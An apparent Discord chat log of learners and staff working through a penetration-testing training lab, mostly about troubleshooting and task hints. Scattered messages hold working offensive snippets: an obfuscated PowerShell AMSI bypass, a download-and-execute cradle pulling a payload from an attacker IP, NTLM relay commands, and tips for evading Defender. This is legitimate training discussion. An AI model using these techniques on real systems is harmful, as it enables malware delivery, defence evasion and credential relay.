#holo-network
cool, just wanted to make sure -- I saw it was at 104/106 haha
did you end up getting it working?
ok, lol the question is submitted the last flag
gg no re lmao
I DM'd you the final flag on thm as well
yeah, psexec didn't work for me but smbexec did
will add a note ^
finally completed the network
Thanks @wind bobcat @lone spruce for making this awesome room and helping wherever i got stuck
thanks to you too @river cradle for all the help
waiting for more networks now lol
Gave +1 Rep to @wind bobcat
btw the S-SRV02 bug should be fixed by Tuesday at the latest
My powershell grunt doesn’t seem to work even when amsi is bypassed.
As far as I know amsi is bypassed anyway, because the payload I have works on my machine (not being picked up) but not from a remote machine. I may mess around with the listener and web ports (is it a problem if they're the same?) as I may have some weird firewall rule due to my setup.
I also need to change the HTTP profile in Covenant
yea it doesn't work because it's blocked by defender 💀
i ended up using simple rev shell script from revshells.com
u need to clean
covenant
My php file downloads the stager.ps1 file from covenant, and this includes the AMSI bypass, and then includes the payload itself
How is defender blocking it if it’s being executed in memory? Surely only amsi should be of concern?
Is it defender blocking the execution or something? @livid shoal
As in noticing it’s suspicious and stopping it?
@wind bobcat could you please dm me?
regarding?
last flag
appreciated it
we all might have discussed some mutual problems lol
which made it a lil faster
yeah
it does
maybe
How/why?
amsi is just one thing
Could I change the php payload to just execute the grunt there and then?
Would that bypass? Is it because I’m downloading something that it’s flagged? The download hits so it’s obviously my grunt which it doesn’t like. Or the AMSI bypass I have doesn’t work (the AMSI program checker thing returned no problematic strings) so I’m assuming AMSI is bypassed?
naah just make a PowerShell payload with amsi bypass at the top and the reverse shell code at the end. you can try covenant stager too but that didn't work for me. now from php just execute the ps1 file
IEX(New-Object Net.WebClient).DownloadString('http://10.x.x.x:3333/yourpayload.ps1')
I have IEX (IWR http://etcetcetc)
And that works on my testbed machine but I do have an exclusion zone on the C drive. May have to add another drive to my VM and run it in there
yea try it
i was too but it's easy to use simple reverse shell
Will have to get back to it tomorrow now. Thanks for your help
I’ll change the profile and all settings, then will also look at its code and mess with that a little.
Can I stream holo on twitch if I plan to do it from Wednesday onwards? Just confirming as again it's for sub only ppl
Gr8🔥 thx ❤️
Wait is the holo network available to everyone?
for subscribers only
Ok, nice, I'm going to connect now 🙂
I'm using covenant and all of my grunts keep dying. Real time detection is off and none of the modules actually work - all i get is 'command is uninitialised' for every task i try to use. Any ideas? I followed installation, and have a filepath exclusion for defender where covenant is installed.
okay it seems that's down to the powershell launcher
it dies
whenever i run a task
the binary launcher is fine
wait did u end up getting covenant working?
wow
i never did
🥲
i think i will do the network again with covenant
to work out what my issue is
with an amsi bypass i could have it working
but
and big but
the powershell launcher dies almost instantly
i can't task anything
even with real time protection off
ahhh
defender is always on. it's a core windows feature. u need to clean the payload
rtp and defender are different things
oh right. but i turned real time protection off? and disabled all other settings.
u tried the payload on your local machine?
u getting any defender alerts?
also
even if rtp is off it's not off on the main machine
none
so it's of no use anyways
the server machine has it on
i have the binary working fully
no issues
real time protection on
now to test on the network
woah
it didnt work for me even if i
disabled that
idk why
i did nothing at all to the settings.
I'm going to soft reset and try again just to be sure
hmm I'm really stumped right now lol
trust me use powershell reverse shell payload first
then u can always
execute a binary
from covenant
by disabling everything
yup it worked
binary launcher
i tweaked default settings for good measure
but yeah i downloaded with powershell IWR http://WEBADDRESS/launcher.exe -O launcher.exe; .\launcher.exe
nevermind
defender kills it again when i run a task
xD
exactly
it won't work
👀
use reverse shell
check the payload with threat check
once
it sent an email for gurag but didn't give any token with it.
the token is right in front of u
👀
damn that's in the cookie, all this time i was looking in user_token params
lol
Hi. I have a doubt about 'What file leaks the web server's current directory?' in Task 9. I have completed 50% of the room now but not able to understand what is needed to answer this question.
The answer is related to running the tool discussed in the task. 🙂
┌──(tac㉿kali)-[~]
└─$ ping 10.200.124.33 1 ⨯
PING 10.200.124.33 (10.200.124.33) 56(84) bytes of data.
From 10.50.121.1 icmp_seq=1 Destination Host Unreachable
From 10.50.121.1 icmp_seq=2 Destination Host Unreachable
someone have issues too?
I am having issues
Could you be a little more verbose
try disconnecting/reconnecting to vpn
i did before asking
wait we need a reset_token not user_token
same
thing
append it ahead of the parameter
👀
it worked 🙂

🖨️ 🐛
👀 saupki ig u need to patch print nightmare vuln in holo if not already 👀 someone was trying that way. when i rdp once, the cve exploit was on the machine and someone was trying to execute it idk if they succeeded or not
if it was a challenge network, I'd be more concerned with it
however, the main goal of the network is to learn
if you're learning something by trailing print nightmare, good.
How is ur OSED spooks
whenever someone asks, I just provide them with this link:
https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/d--da--db--dc--dd--dd--df--dp--dq--du--dw--dw--dyb--dyd--display-memor
If anyone is still in the .69 network - Leave and rejoin the room and you'll be assigned to a network with less than 120~ people
woah and with this i am thinking 👀 will there be a challenge network in future?
likely. I'm really just waiting a bit before I decide to pitch one
ive got a million ideas
since I've got to make some changes anyways, I'll disable print spooler
that's nice. also i got a doubt. the attack we did in the last is not widely used. why so? didn't get that
because no one really ever thought to do it except me and some other dude
woah noice 👀
also how this part?
The reason this attack vector isn't widely used is that it is very disruptive. If the server is busy, you are unintentionally creating an SMB DoS and creating server downtime. In a real engagement, this is a huge problem
like how does it create an smb dos
you're turning off SMB on the target system, preventing other devices from accessing it
I'm stuck on obfuscation shell part, can someone help out a bit. In small study room
i encrypted the payload but can't get it up on srv01
the command sc stop lanmanserver && sc disable lanmanserver disabled the actual SMB service from running
also no threats found in threatchecker, compiled that as well
ah isn't there a way to fake it somehow for the services. ( sorry if i am talking some senseless things really new to this stuff 😅 )
@livid shoal can you help if you are free a bit
No -- it's not so much that; you're physically stopping the windows service from running on the machine, closing the port and redirecting all inbound traffic on the machine to you (the attacker), so you are effectively the listening SMB service, not the windows machine.
The only possible way to make it accessible would be with some magic that I tried and it didn't end up working
magic 👀
like can't we do something, intercept the traffic and send it back to the machine at the same time too
no
you'd have to build something custom for it, and it'd take a ton of time and a ton of effort
yea but its a possibility? like in theory this can be done ?
anything is possible
theoretically here's the process that you'd have to take:
- Verify the credentials are valid against a device
- Hold the session open w/ NTLM Relay X
- send back the "ok authentication is all good" (which might destroy the held open session w/ NTLM Relay X) on the target machine
- Proxy a connection between the pwned device's filesystem and your kali machine (since that'd be the device that's brokering the conversation)
Just because threat check says it’s clean doesn’t mean it is
look at the blog post referenced
my file is uploaded and windows is not deleting it for some time now
someone get stuck at resetting too? im waiting for three hour and nothing change
just verifying, you refreshed the page, correct?
yes, leave room, restart pc, i can't ping too, try with vpn and startbox
cc: @outer junco
I'll take a proper look into why this is happening, thanks for letting me know.
Hello, I'm stuck on AV Evasion. If I understand, we need a payload containing AMSI bypass (like patching amsi.dll), a payload (a ping for example) and the entire payload needs to be obfuscated. But this doesn't work for me. Have I forgotten something?
(I've checked my payload with ThreatCheck too)
If you’re using a covenant grunt then obfuscation isn’t enough
They give info on killing any signatures
But
I'm not using covenant
I'm using https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell#Patching-amsi.dll-AmsiScanBuffer-by-rasta-mouse
and a simple ping command in a PS1 file
Have you tested your payload on a windows machine with defender on to see how it responds?
I've obfuscated the file with Invoke-Obfuscation
I've checked my file with ThreatCheck
Okay. It’s really hard to say why it won’t be working
But try it on a windows machine
That you can see output on
That way you know what’s going on and if it’s working.
Ok, if I have the right methodology, I'll try harder.
Thank you @next kite 😉
Gave +1 Rep to @next kite
No probs.
I ended up having a multi stage thing. Php file uploaded which downloaded a stage1. Stage 1 was the AMSI bypass, and then the bottom of stage 1 was to download stage 2, which was the revshell. I tried it all together as 1 launcher but it was being picked up and not executing
Good idea !
When you’re on you can disable AV
ok
Really struggling with the DLL stuff
I suck at windows lol
So far I think I found something but I didn't find it on scheduled tasks. Only by fluke because I checked 'ps' and also enumerated the users dirs
the thing doesn't execute even without my dll
says i don't have permissions 😦
i don't suppose there's a reboot script which fixes things is there... lol
because you don't have permission to run it
Oh ok lol
a "user" on the network runs it
That makes senseeee.
I must have been doing the right thing then. Maybe.
I’ll have to look again tomorrowwww
as always I suggest testing on your own dedicated environment first
test your dll, download the application, make sure it's the right DLL name, etc
Sure thing 🙂 I'm getting tired and lazy, should have just done that. I've done it every other step of the way
There was nothing in scheduled tasks @lone spruce - was there meant to be? Maybe I missed it but all of them had the path of ‘Microsoft’@something or another. I can’t remember exactly but away from my PC now
Hi, can anyone help me with the privesc of L-SRV01? I always receive this message "Unable to find image 'alpine:latest' locally
docker: Error response from daemon: Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers).
See 'docker run --help'."
you should look and see what images are available for use and not just copy what's on gtfobins
Yeah, I had forgotten about that detail but I managed to resolve it a few minutes ago, but thanks for answering anyway
Gave +1 Rep to @wind bobcat
you could do that in one file only
rather than just bypassing it, i tried a simple ps1 which can be executed with php
just tried telnet and tried to listen on it, but failed. So i don't think my exploit will work
any suggestions
I've started with a ping and it works for me. On my machine I listen for ICMP packets with tcpdump to receive them
After that I've added complexity to bypass AMSI
nooo whyyyy. defender is still there
u need to bypass amsi
anyways
defender won't allow the connection
and wait telnet is not on windows?
is it?
it's not, tried it
i created an obfuscated web shell and got a simple web shell
now from there i'm trying to bypass the amsi
just for troubleshooting, can't figure out what i'm doing
it's sort of a known issue
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true) i tried it to bypass amsi
it works on my machine and then it can run the ps code but fails on the remote machine. I'm running windows 11 everything patched up.
why windows 11

been in insider program for long time, it was normal update 🙂
yea so try in a windows 10 vm

lol
it picked up a ps script without bypassing amsi
after bypassing amsi it didn't pick it up on windows 11
To land in PC-FILESRV01 we need to pass the hash, but it didn't work. Have I missed something?
what help?
use rdp ig
nope cant do vc rn
Thx 😄
Gave +1 Rep to @livid shoal
no probs
Please keep all messages in English in this discord
got in but within 5 sec, my rdp session gets terminated
[16:48:36:723] [9008:9009] [ERROR][com.freerdp.core] - rdp_set_error_info:freerdp_set_last_error_ex ERRINFO_DISCONNECTED_BY_OTHER_CONNECTION [0x00010005]
||proxychains xfreerdp /v:10.200.128.31 /u:watamet|| this is what i used to connect
any suggestions?
a step or some info should be added before task37 about RDP part of it
yet with this problem 
lol u need to wait ig
maybe some other person has an active session
just wanted to know if it's a bug for me or someone is seriously logged in
so now i have to search how to kick someone out of a session from ps 😆
nope, no one is in active session
great
on file server task 37, logged in as user. As per task, I'm supposed to have access to Group Policy Editor
to enable access to applications
we need this access, but can't this gp
when i open secpol.msc, i get this
I can't find the answer for question 2 in Task 38:
What monitoring/event-logging solution is employed on PC-FILESRV01?
What have I missed?
well how did you bypass applocker, i can't even access group policy
Yes, you can't access it, you don't have rights.
then how are we supposed to bypass it in task 37
but you can find folder where AppLocker doesn't work, take a look at applocker_check.ps1
ok for me i think then the whole point is i don't have any applocker folder and applocker_check.ps1
you have to upload applocker_check.ps1 to the victim (with smbserver.py or python -m http.server)
did you find it, i can't find it as well. Trying to reset network
for me when i was trying to do priv esc changed few things in windows firewall
even wiped existing signatures 😆 cause of amsi
No, I can't find it :/
any suggestions for 2nd question in task 38
i tried both tools, didn't get an answer
@outer junco have you taken a look at .124 yet? Still stuck in a reset state
It just needs 1 more person to reset the network for it to come back online, looking through the logs to find the true cause of why it got stuck in resetting - as a quick fix if the user resets the network again, it'll bring the network back up.
placed both files in one dir but when i execute kavremover i get an error about admin privs
i tried two other injectors 1. Extreme injector 2. Xenox (i was able to see the process but don't have access rights to inject)
when i run kavremover tool a txt file will be dumped with these logs
i
i'm out of ideas how i can inject in this application
wha-
what you need to inject?
you dont run the application
^
a "user" on the network runs it
a dll from metasploit
u just place it
i placed it but never got the shell
while for testing when i injected it in notepad i got a shell so at least the shell is working
can't run procmon as well need admin access
u need to run procmon
on your
machine
download that exe
to your vm and run it
see the processes
got it
Pls fix holo it's state is paused..
it doesn't have kavremoverENU.dll
and that was my dll name but still i never got shell
renamed the file to other dll but still same
any suggestions
maybe can you guys recon one
have you tested it on your own machine first?
it could be a number of problems
are you fully reading the tasks before you just go and throw things around? Most of your questions you've asked have already been answered
am I the only one having problems reaching L-SRV01 via ping? I'm successfully connected to the network...
which network are you on?
69
It's just I straight away started from the Holo network as a newbie sorry
that fixed it - thanks!
Gave +1 Rep to @wind bobcat

quite simple as: have you tried turning it off and on again 😉
well
try resetting the network ( if u got votes )
it didn't work for me as well the first time.
but eventually it did
well do the basics first.
Holo is definitely not something you should just start with right out of the gate. It’s designed in such a way it teaches all concepts needed but it assumes some background knowledge to begin with
Holo taught me a ton of things which I couldn't have learned from basic machines in this time
I made the mistake of just diving into the deepend of the pool and now I'm drowning
I have been a neural net developer for 2 years, have done windows automation with beatbox, powershell, python, .net for a year
Like I found different injectors extreme, xenox for dll hijacking. I'm trying my best to find out alternatives as well.
I have to do windows machines mainly, as asked by my manager. I am working on research to detect attacks in real-time on AD, so I need a ton of logs after attacking my home labs. Got a mail exchange server network at home as well just for this in a hybrid environment. Been reading a few research papers as well. Writing a review paper currently 🙃.
u don't need them, the injectors. did u read the instructions?
anyone else having connection issues?? Having issues with the holo network, can ping but cannot access the dev and admin portals, everything was working well all this time
you added that to hosts file?
Oh for crap sakes, i was stuck with task 7 did a port scan but no port 80. eventually left the room got a new ip and got a port 80 open
is there something wrong with ip 10.200.69.33 ?
I mean the whole 10.200.69.0/24 network
yes
actually not but yea there were like 120 👀 persons on same network
so ....
well that explains 😅 thanks
i read the instructions but exploit was not working so i just wanted to test my dll if my reverse shell is valid or not. So i injected my dll in notepad and got user shell
just a trial and error
figured that out today
in task 46, it's nowhere mentioned we are supposed to turn off services on dc, srv02, or fileserver.
i disabled the services on fileserver and I'm lost now
on which server we're supposed to run shell from meterpreter and do port forwarding
also there is a bug in task 38 What monitoring/event-logging solution is employed on PC-FILESRV01? we don't have any monitoring agent on the server, at least not anymore, if there should have been an amazon monitoring agent or something.
there is
+1
u only have shell for file server
so thats what u
are working on
i have the admin shell on fileserver
why we have to create another shell.exe for the same server
yea u can avoid that
part
u need a meterpreter tho
if not already
nope we don't have any agent at least now
so here's what i did i picked up all the source from applications
PS C:\Users\watamet> Get-EventLog -LogName Application | select-object Source | clip
and used a regex which tryhackme is expecting can be 6 words so i threw the output on regex101 and used a simple regex \w{6,6}
we don't have any possible candidates which can be a logging agent
i'm trying my best 🙂
Event logs are not mentioned once in the tasks
There's also learning in doing things that provide no expected results. 😄
manan told me to do it
i used seatbelt but didn't get any result
not the event logs
can u open event viewer ( use rdp ) idr exactly whether i had the right for it or not ? if not then yea it's a bug. it doesn't come in seatbelt logs
but its pretty common
so you can guess it
@radiant spindle
i'll try it tmrw only one task left now, will start throwback
does the ntlmrelay take a long time to catch something ?
about 10 min, and the network stops
the task says 1-3 min
@wind bobcat bork
@livid shoal how long have you waited for ntlmrelay ?
if it doesn't come instantly, make sure you typed in all the commands correctly
if it doesn't work -- reboot the machine
all commands are correct, all logic is in place, so I don't understand
Wireshark should still be installed - if you run it and filter on TCP port 139,135,445 do you see inbound SMB connections coming from S-SRV02?
and most importantly, you've installed the two packages in Kali and added the smb2support flag on ntlmrelayx?
Hi @wind bobcat can you send the S-SRV02 flag for me too, I already finished the DC.
Will send it over on THM in a sec -- btw you don't have Task 27 Q3, Task 38 Q2 to do as well
Spooks babes you gonna fix that box?
sometimes it works instantly sometimes it takes time
1-3 mins is a sweet spot
With all the hashes that I try I always get an error message STATUS_TRUSTED_RELATIONSHIP_FAILURE from the S-SRV02 host.
because the machine needs to be readded to the domain. and that needs to be fixed
and that can only be done via local administrator account
i created a local relay with metasploit by turning off proxychains, but now when i use the socks flag in ntlmrelay i get no relays available
and if i go with proxychains then i waited for like 10 min. didn't get anything
added the proxy in proxychains as well socks5 127.0.0.1 1080
have the connection in netstats as well tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
+1
did you try socks as well with ntlmrelay rather than proxychains, is it the same for you with -socks as well ?
yo exact same
verified smb is off in local responder
╰─$ cat /etc/responder/Responder.conf 130 ↵
[Responder Core]
; Servers to start
SQL = On
SMB = Off
For question 2 of task 38 (event logging/monitoring) I've searched with multiple tools (seatbelt, SharpEDR, Event Viewer), looked around in C:/ directories, procmon, services, but I've found nothing. Has something changed on this server ?
ok at least started getting responses, here's what i did: terminated my shell and waited for a new msf shell
once i got it forwarded the port while ntlmrelayx was on
the moment i forwarded the ports again, i started getting response on ntlmrelayx
but can't get hold of a relay, stuck on attacking target for 5 min
was your pivot using sshuttle or chisel with socks? and are you running your ntlmrelay through that proxy
i terminated my chisel proxy
i created port forwarding through msf and then added address in proxychains
and used ntlmrelayx
because of the way the attack works, you will need to have ntlmrelay be proxied through the pivot for it to reach the target server
sudo ntlmrelayx.py -t smb://10.200.135.30 -smb2support -socks
in msf i have a portfwd for pivot
so if you were doing chisel, you'll need to get it back up + probably change the port to be something other than 1080 because that's the port ntlmrelay will try to bind to to create a proxy after making the session
lemme try
that's for forwarding :445 to your machine
you still need a way of reaching .30 from your machine
and unless you routed it through something else, you will need to get your pivot back up
in chisel by default it picks up 1080 port in listener
you can change it by using R:port:socks instead of R:socks
so R:1081:socks for example
i think the main problem is the dc can reach my machine but i can not, correct me if i am wrong, so we have to create another proxychain to listen
not to listen but yes, you can't reach the DC
so this is my proxychains now
socks5 127.0.0.1 1080
socks5 127.0.0.1 1081
are you using proxychains or proxychains4?
proxychains
I'm using sshuttle for my pivot, ntlmrelay seem to work, but
you might need to comment out 1080 if it causes problems since it doesn't exist yet
are there any errors in the ntlmrelayx window/log after running this?
No errors :
try using secretsdump instead of psexec, and then psexec with the dumped hashes
without psexec we can create account for "mynewuser"
since secretsdump uses smb under the hood too, you can try to run it directly through the proxy without the need of a new user, that's what i did
also you might want to restart the relay and catch a fresh session, might be helpful
you won't need to re-forward the port, just restart the relay itself
use smbexec
psexec doesnt work for some reason
it works
:)
I have a domain admin user, but when I'm trying to login to SERV02, I have this error:
[-] SMB SessionError: STATUS_TRUSTED_RELATIONSHIP_FAILURE(The logon request failed because the trust relationship between this workstation and the primary domain failed.)
Do you know why?
.
+tech support
I cant login to the admin panel anymore, I get a 302 response with in the response body 'valid' but it keeps loading forever 😫
restart the browser, phpsession is valid for one time
Should have thought about that 😅 Thanks man!
Gave +1 Rep to @radiant spindle
also there is a bug in question 2 of task 38, which monitoring agent is installed, please please look into that as well. There is no agent installed, at least not anymore
Hi @wind bobcat can you send the S-SRV02 flag to me as well
Hi @wind bobcat, can you send me the S-SRV02 flag too plz?
👀 i mean have u heard about sysinternals?
yup i do but that's not in tasks
I’ll look into it but I’m 80% sure it’s still there
@daring crest @radiant spindle shot you both messages over on thm
Any chance for a reset on the .106 network please. The program needed for the dll hijacking is gone so I can't do it
Oh wait it’s here but not sure if it’s in the right place
Can I PM someone please to see if it’s in the right place!
Thanks 😄
Gave +1 Rep to @wind bobcat
I also can’t move it back
Or if someone is admin please could they send it back to the right place please. The scheduled task is no longer executing
I've added a +1 to reset your network
It’s been stuck on 2 for 2 days - I’ve checked regularly and been waiting. My files I created two days ago are still there. Admittedly should have just hit reset
Have you rooted it and done the dll task? Any chance you could move the file back as an admin please 🙂
It does have to run from a certain place right?
It’s currently in tasks (i don’t think it should be there)
Thanks
Gave +1 Rep to @daring crest
yes, the dll needs to be in the right folder (i've placed it in multiple folders to be sure :p )
Thank you, amazing
This vm is also vulnerable to PrintNightmare LPE
we're aware
this is the official response on print nightmare -- We're not overly concerned w/ patching things like that. We're more up for teaching users new attack vectors -- if that's the way you wanted to do it, that's cool. As long as you learned something 🙂
no, it shouldnt probably someone messing around and moved it attempting to bypass applocker
Okayyy
I used print nightmare to get admin so I could move it back and get it working
It’s not right now for some reason but I’m on it 🙂
on my local instance lol
ie the master instance for all the other networks
The logging agent, scheduled task, and application are all there
I’m unsure if the NTLM relay is working. I’ve been waiting 5 mins (I know the room says two or three). I disabled all required settings and have my meterpreter port forward going
It’s not
Ohh
spooks is losing his mind over it
Ask spooks for the flag lol
Is that @wind bobcat ?
I tried messaging but discord settings disallow it
Wait
I got something
it is nematode
S-SRV02 is the one that's broken
if it's been that long and you've triple checked the settings outlined in the task and aren't getting a session relayed to you, reboot PC-FILESRV
I just got something 🙂
ezpz
I just get connection refused lol
With psexec
Not sure my port forward is working
It says local relay created
And then I get connections from the srv admin
@wind bobcat
It may be as I’m running in WSL On windows commando and that has some funky networking
I’ll try shifting in just a minute.
a couple of others have said to try smbexec
Yeah it doesn’t seem to be working
Smb exec also doesn’t work for me. I get an error ‘don’t have a relay’ when I try it, but I have my meterpreter port forward, and I’m getting output from the NTLM relay
What am I doing wrong?
That’s running my vpn direct on the WSL VM so I don’t think it’s networking issues
Need to reset
Why?
I'm getting the Trust Relationship has failed when trying to RDP to S-SRV02 with the domain user I created. Any fix for that?
it's being worked on
if you need the srv02 flag then ping spooky
What’s going wrong in my NTLM relay above? I attached pictures to help debug.
Are you using sshuttle or chisel for your initial pivot? I couldn't get it to work with chisel, but worked with sshuttle.
I’m using chisel
I’ll have to try sshuttle
But I
It shouldn't make a difference because I have my shell from the file server through meterpreter that is port forwarding
the portfwd in msf is only on port 445
Yes but then ntlmrelayx also starts a proxychains
So I need my sshuttle running still I guess
That's what worked for me. Run sshuttle, and then drop the proxychains on the ntlmrelayx command.
Ah this is where I’m going to have issues
I’m working out of WSL
Which can’t use ip tables properly so sshuttle doesn’t work
Not sure on what you need to do then. I couldn't get it to work with Chisel since chisel and ntlmrelayx are both trying to use the socks proxy.
check PM's on THM
Awesome, thanks!
Gave +1 Rep to @wind bobcat

I’m going to look into how to change the port for chisels proxy
Or for ntlmrelayx
Can’t find anything with a quick google so may have to jump over to my parrot machine and just do from there where I can run it
use R:port:socks instead of R:socks in client arguments
Oh amazing, thank you so much!!!
if you were to change the port for ntlmrelayx it involves modifying the source code which was problematic when i was trying it 😄
I moved over to a commando VM recently as I figured it was way easier for attacking windows from windows. It is, as I've found here, but it has its quirks when it comes to networking. I'm using WSL2 which just has weird stuff going on and it changes IP every boot
However it’s been worth it so far.
Maybe I’m overthinking. @river cradle but how do you specify for the impacket to go through the right proxy chains?
Is it you change config half way through? Or is it clever enough to work it out
if you use proxychains4 instead of proxychains you can specify a config file with -f /path/to/config.conf which allows you to be more flexible with proxy configs
Okay cool, thank you again 🙂
I really recommend using it instead of the old version and possibly aliasing proxychains to be proxychains4 since it's compatible but allows for those custom config locations
@wind bobcat I’ve done the room 🙂 just can’t get that srv2 flag. Would you mind messaging me please 🙂
Was the intention for NTLM relay to work for SRV2?
kinda, it should be possible but the SRV2 seems currently broken so domain credentials wouldn't work on it iirc
Yeah I tried passing the hash but it failed with a domain trust issue
Would someone mind helping me also with the 'what monitoring/event logging solution' is employed. I checked the hint and only have one process flagged and that's not the answer
Thanks @river cradle that proxychains trick did it by the way 🙂
Gave +1 Rep to @river cradle
psa I've temporarily removed S-SRV02 flags
Now the last flag... what monitoring/event is running on PC-FILESRV01? I did put a procmon on the server, looked in files, but no signal of that solution. Can someone help me with this?
ahhh yea it doesn't come in logs, or maybe I didn't enumerate much before, I just remembered it by memory. But it's such a common option to be used in Windows-based systems
sysinternals
Hey - I am currently in the process of trying to get a reverse shell for the .33 machine - the fuzzing of RCE did not work at all, only by looking at the source code was I able to decipher which parameter should be vulnerable, when trying to query whoami via this parameter I don't get any response (except the header) when following the provided command curl -vvv ...etc - is this a known error?
update... someone disabled? the login again on 10.200.137...
@wind bobcat you take szymon off the file server?
why in the hell would I do that

Because you would
are you sure it was root and not linux-admin?
Yeah I'm sorry I just realised it was a stupid question
And I guess to be root, we need to use the SUID?
yup
ok something is off - so whenever I reset the network the login for the admin panel on 33 works the first time, but at some point the shell crashes/dies and then I cannot login with the credentials anymore?
I had the same problem, you have to restart the browser because the PHP session is only valid for one time.
😮 thank you!
Gave +1 Rep to @zenith canyon
^^ good solution. you can also open an incognito tab
I think that's what I advised the testers to do
Hey there don't suppose anyone can give me a nudge with task 12 ? I'm fuzzing for the parameter for RCE and I'm not sure I'm even using the right wordlist now. I've been using the suggested one, seclists/../../big.txt, but I'm still finding nothing. I know the right page to fuzz I just can't seem to get the parameter.
Is anyone able to give me a nudge or DM me about it ?
Can anyone please nudge me on the last step of task 12?
another way to locate it if you're having trouble fuzzing is to view the source code and look for some comments
have you tried dirbuster looking for .php files?
currently the ip is 192.168.100.1, but that routes automatically to my router
I got the file was just struggling to find the param to fuzz for rce, but i got it now
thanks tho
and Im unable to finish the first box
Can't you change your router gateway address ?
honestly that's the first time i've heard of a router being on 192.168.100.x
same here
if you run the requests through proxychains so it goes through the proxy, it will route to the proper machine
not needed
all this should be done on the docker container
none of this should be done on an attacking Kali machine
just curious but is there a specific reason for that?
yeah, so docker essentially creates a nat'd network interface
^ yep, 100.1 is essentially the docker containers default gateway
which leads to L-SRV01
and that I cannot connect to
So basically as long as you're connecting from a VM or Docker on a Nat Connection it should be fine right?
.100.1 wont allow from my kali
100.1 won't be routable from your Kali machine.
you running kali on bare metal ?
the only device that can access it is L-SRV02, or the docker container.
from the docker container.
task 15-18 will all be done from the docker container.
you will end up on L-SRV01 when you're finished.
I think this is getting lost in translation
yeah I think the wires are crossed
as I was hunting for flags the ip changed
and my shell died
but anyways, is anyone else having issues getting on the admin domain ?
my shell died and been unable to log back into the admin domain to get my shell back
open a page in an incognito tab and try again
php magic
kek
- You won't access 192.168.100.1 from your Kali machine
- You access it from the machine you have gained command execution on
- The 192.168.100.0/24 network is for docker only.
- Two machines live in the 192.168.100.0/24 network, L-SRV01 and L-SRV02
- You will use the command execution gained in Task 12-13 to compromise 192.168.100.1 outlined in tasks 15-18
Basically do the RCE from task 12 again to get your shell, then you can get back on to the 192.168.100.x machines
Your router address doesn't affect this since you're on a different internal network
I can't get root using suid in task 19
don't use the alpine container
use one of the containers docker already has
ohh got it
don't blindly run commands, always try to understand what they're actually doing
there are 5 images. i can use any one?
is anyone around who could explain the d***er escape to me ? I get how it works I just don't understand how the syntax looks since sql doesn't seem to like php for a table name
maybe I'm misunderstanding but not sure and don't wanna spoil it for anyone
technically yes but stick to using the ubuntu one since others are for services and take up more space
essentially, what you're telling the SQL server to do is echo text (that being a php command shell) into a file on the system
don't you need to save the command shell as a table before you can echo it into a file ?
nope
you're fine lol
it was the way the steps are laid out in the task
I was wondering what the need is for making a new table
yeah, the traditional convention is that you'd dump the contents into a file for backups, or whatever
rockyou is getting exhausted trying to crack the shadow passwords
which hash are you trying to crack?
root and linux-admin
The 10.200.69.33
is it asking the root password ?
I actually have the root shell.
yes
the .69 subnet is broken
as I said before
you need to leave the room and rejoin
there are technical issues with that subnet specifically.
it was never meant for users to join it.
Ok leave the room and rejoin right?
yes
Ok
you will need to regenerate your vpn access for your new network too
I cracked the password in task 21. I still need to rejoin right?
yes so that you can continue the rest of the exploits
ok
Hey hey coming back to say thanks for the help @wind bobcat, I admit that I didn't understand what was happening.
The shell died, the ip addresses seemed to shift and buggered up my stuff, but with you and slight nudges from zerefsec, I've been able to get through most of the room!
Tldr, you did help and thank you.
Gave +1 Rep to @wind bobcat
How am I supposed to find the local ip of the docker container in task 15? When I do ifconfig, or check it in the hosts file, the ip shows up as ||192.168.100.100||, but that's not correct
that is correct. 192.168.100.100 is the IP address of the docker container.
It's taking this as the answer for some reason
Am I confused, or is something not right
Just curious but if you run out of time on the network (yes 9 days should be long enough) can you try again another time or are you permanently locked out of doing that network challenge ?
Answers only have to be a certain percentage correct, this accounts for errors. It's normally 1 or 2 digits or characters.
If u refresh the page it'll show the full correct answer.
you can rejoin at any time as long as you have an active subscription
How long does one usually take to finish hololive ?
I'm thinking of starting it but just need to see if I can finish it today
It honestly depends, it's possible to finish in a day
I see I get 9 days to finish it... Just hoping the IPs don't change
You're able to join back after it's just to free up space on the networks
IPs don't change unless you leave the network and rejoin
When the network stops I have to rejoin... but a basic scan should be enough
Hmmm guess I'm fuzzing around the wrong way here.... task9. a nudge is appreciated
Any idea why this happens?
when it stops you just have to start it back up
Nvm, I’m stupid. Figured it out
One more issue, I can access the web page of 10.200.x.31 but can’t ping it or run an nmap scan
need help on cracking shadow file ?
What is the plaintext cracked password from the shadow hash?
I got the hash but it's taking a long time to crack, still cracking, help me with this
ping won't work because it's a windows host and it's very likely it has that disabled
nmap scan should work, but if you're proxying through sshuttle then it will report all ports as open, and you'll need to either run the scan from the linux (.33) machine or switch to a socks proxy
I’m using chisel and have configured proxychains and am using nmap with it, on running a scan it tells me that all 1000 ports are filtered
Use colabcat like instructed in the walkthrough
@wind bobcat did you change the IP because of that one router thing
Am confused
i tried but dont know how to use it
All of the instructions to use colabcat are outlined in colabcat
ok letme try
anyone care to give me a push in the right direction on task9 ?
I must be missing something basic
On the first question?
I tried dirbuster, wfuzzing, gobuster... nothing came back with a filename or directory that had any useful content
Did you put extensions on the end?
-x yes
mind DM?
sure
wat no?
Den why tis it .100
dude i tried with colabcat but can't crack the passwd 😦
Could you be a little more verbose, show us what you’re doing
I used rockyou75 from seclist
can i dm you
that's why
Why did you use 75
you should be using the full-fledged rockyou
@wind bobcat no one has commented on the glorious usage of vtubers
which is set default on colabcat
because we use them for essentially nothing lel
Change it, the password isn’t in 75
Hello to all of you, I hope you have a great time! I think I'm stuck at task 18! I think I tried everything but I can't priv esc from the www-data user and when I try the sudo www-data needs a password. Any hints? Did I miss something?
did you find the ||SUID bit?||
you can do one-off commands on google with
!cat /etc/passwd
for example
Yeah i did that bit
Just change the commands where they are already typed rather than using the blind shell
Thats true indeed but also with the SUID had no luck, i will give it a little more time
might have missed something / did something wrong
yep, the exact command from gtfobins won't work
you need to understand what the command is doing and how to adjust it for what's on the box
